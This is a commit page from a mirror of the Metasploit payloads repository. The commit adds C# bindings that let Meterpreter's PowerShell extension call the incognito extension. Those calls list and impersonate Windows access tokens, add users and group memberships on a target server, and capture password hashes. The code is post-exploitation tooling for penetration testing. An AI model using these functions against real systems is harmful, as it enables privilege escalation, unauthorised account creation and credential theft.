github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-04-12 04:12:05 +02:00
Code Releases Activity

Add support for incognito

Browse Source
This commit is contained in:
OJ 2016-03-24 15:01:50 +10:00
parent ecf10f7e43
commit d286618b13
4 changed files with 2762 additions and 2268 deletions
c/meterpreter/source/extensions/powershell
powershell_runner.cpppowershell_runner.h
powershell/MSF.Powershell
MSF.Powershell.csproj
Meterpreter
Incognito.cs

4832
c/meterpreter/source/extensions/powershell/powershell_runner.cpp

File diff suppressed because it is too large Load Diff

2
c/meterpreter/source/extensions/powershell/powershell_runner.h

@ -6,7 +6,7 @@
#ifndef _METERPRETER_SOURCE_EXTENSION_POWERSHELL_RUNNER_H #ifndef _METERPRETER_SOURCE_EXTENSION_POWERSHELL_RUNNER_H
#define _METERPRETER_SOURCE_EXTENSION_POWERSHELL_RUNNER_H #define _METERPRETER_SOURCE_EXTENSION_POWERSHELL_RUNNER_H
#define PSHRUNNER_DLL_LEN 31744 #define PSHRUNNER_DLL_LEN 35328
extern unsigned char PowerShellRunnerDll[PSHRUNNER_DLL_LEN]; extern unsigned char PowerShellRunnerDll[PSHRUNNER_DLL_LEN];

1
powershell/MSF.Powershell/MSF.Powershell.csproj

@ -42,6 +42,7 @@
<Compile Include="Meterpreter\Enumerations.cs" /> <Compile Include="Meterpreter\Enumerations.cs" />
<Compile Include="Meterpreter\Core.cs" /> <Compile Include="Meterpreter\Core.cs" />
<Compile Include="Meterpreter\FileSystem.cs" /> <Compile Include="Meterpreter\FileSystem.cs" />
<Compile Include="Meterpreter\Incognito.cs" />
<Compile Include="Meterpreter\Kiwi.cs" /> <Compile Include="Meterpreter\Kiwi.cs" />
<Compile Include="Meterpreter\Sys.cs" /> <Compile Include="Meterpreter\Sys.cs" />
<Compile Include="Meterpreter\User.cs" /> <Compile Include="Meterpreter\User.cs" />

195
powershell/MSF.Powershell/Meterpreter/Incognito.cs Executable file

@ -0,0 +1,195 @@
using System;
using System.Collections.Generic;
namespace MSF.Powershell.Meterpreter
{
public static class Incognito
{
public enum TokenType
{
User = 0,
Group = 1
}
public class TokenSet
{
private const string NoTokens = "No tokens available\n";
public List<string> ImpersonationTokens { get; private set; }
public List<string> DelegationTokens { get; private set; }
public TokenSet()
{
ImpersonationTokens = new List<string>();
DelegationTokens = new List<string>();
}
public TokenSet(string impersonationTokens, string delegationTokens)
: this()
{
if (!string.IsNullOrEmpty(impersonationTokens) && NoTokens != impersonationTokens)
{
ImpersonationTokens.AddRange(impersonationTokens.Trim().Split('\n'));
}
if (!string.IsNullOrEmpty(delegationTokens) && NoTokens != delegationTokens)
{
DelegationTokens.AddRange(delegationTokens.Trim().Split('\n'));
}
}
}
public static bool AddUser(string server, string username, string password)
{
System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call AddUser");
Tlv tlv = new Tlv();
tlv.Pack(TlvType.IncognitoServerName, server);
tlv.Pack(TlvType.IncognitoUserName, username);
tlv.Pack(TlvType.IncognitoPassword, password);
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("incognito_add_user"));
if (result != null)
{
System.Diagnostics.Debug.Write("[PSH BINDING] Result returned, incognito is probably loaded");
var responseTlv = Tlv.FromResponse(result);
if (responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0)
{
return true;
}
return false;
}
System.Diagnostics.Debug.Write("[PSH BINDING] Result not returned, incognito is probably not loaded");
throw new InvalidOperationException("incognito extension is not loaded");
}
public static bool AddGroupUser(string server, string group, string username)
{
return AddGroupUserInternal("incognito_add_group_user", server, group, username);
}
public static bool AddLocalGroupUser(string server, string group, string username)
{
return AddGroupUserInternal("incognito_add_localgroup_user", server, group, username);
}
private static bool AddGroupUserInternal(string msg, string server, string group, string username)
{
System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call AddGroupUserInternal");
Tlv tlv = new Tlv();
tlv.Pack(TlvType.IncognitoServerName, server);
tlv.Pack(TlvType.IncognitoGroupName, group);
tlv.Pack(TlvType.IncognitoUserName, username);
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(msg));
if (result != null)
{
System.Diagnostics.Debug.Write("[PSH BINDING] Result returned, incognito is probably loaded");
var responseTlv = Tlv.FromResponse(result);
if (responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0)
{
return true;
}
return false;
}
System.Diagnostics.Debug.Write("[PSH BINDING] Result not returned, incognito is probably not loaded");
throw new InvalidOperationException("incognito extension is not loaded");
}
public static bool SnarfHashes()
{
System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call SnarfHashes");
Tlv tlv = new Tlv();
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("incognito_snarf_hashes"));
if (result != null)
{
System.Diagnostics.Debug.Write("[PSH BINDING] Result returned, incognito is probably loaded");
var responseTlv = Tlv.FromResponse(result);
if (responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0)
{
return true;
}
return false;
}
System.Diagnostics.Debug.Write("[PSH BINDING] Result not returned, incognito is probably not loaded");
throw new InvalidOperationException("incognito extension is not loaded");
}
public static bool Impersonate(string user)
{
System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call Impersonate");
Tlv tlv = new Tlv();
tlv.Pack(TlvType.IncognitoImpersonateToken, user);
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("incognito_impersonate_token"));
if (result != null)
{
System.Diagnostics.Debug.Write("[PSH BINDING] Result returned, incognito is probably loaded");
var responseTlv = Tlv.FromResponse(result);
if (responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0)
{
return true;
}
return false;
}
System.Diagnostics.Debug.Write("[PSH BINDING] Result not returned, incognito is probably not loaded");
throw new InvalidOperationException("incognito extension is not loaded");
}
public static TokenSet ListUserTokens()
{
return ListTokens(TokenType.User);
}
public static TokenSet ListGroupTokens()
{
return ListTokens(TokenType.Group);
}
public static TokenSet ListTokens(TokenType type)
{
System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call ListTokens");
Tlv tlv = new Tlv();
tlv.Pack(TlvType.IncognitoListTokensTokenOrder, (int)type);
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("incognito_list_tokens"));
if (result != null)
{
System.Diagnostics.Debug.Write("[PSH BINDING] Result returned, incognito is probably loaded");
var responseTlv = Tlv.FromResponse(result);
if (responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0)
{
var impersonationTokens = Tlv.GetValue<string>(responseTlv, TlvType.IncognitoListTokensImpersonation, string.Empty);
var delegationTokens = Tlv.GetValue<string>(responseTlv, TlvType.IncognitoListTokensDelegation, string.Empty);
return new TokenSet(impersonationTokens, delegationTokens);
}
}
System.Diagnostics.Debug.Write("[PSH BINDING] Result not returned, incognito is probably not loaded");
throw new InvalidOperationException("incognito extension is not loaded");
}
}
}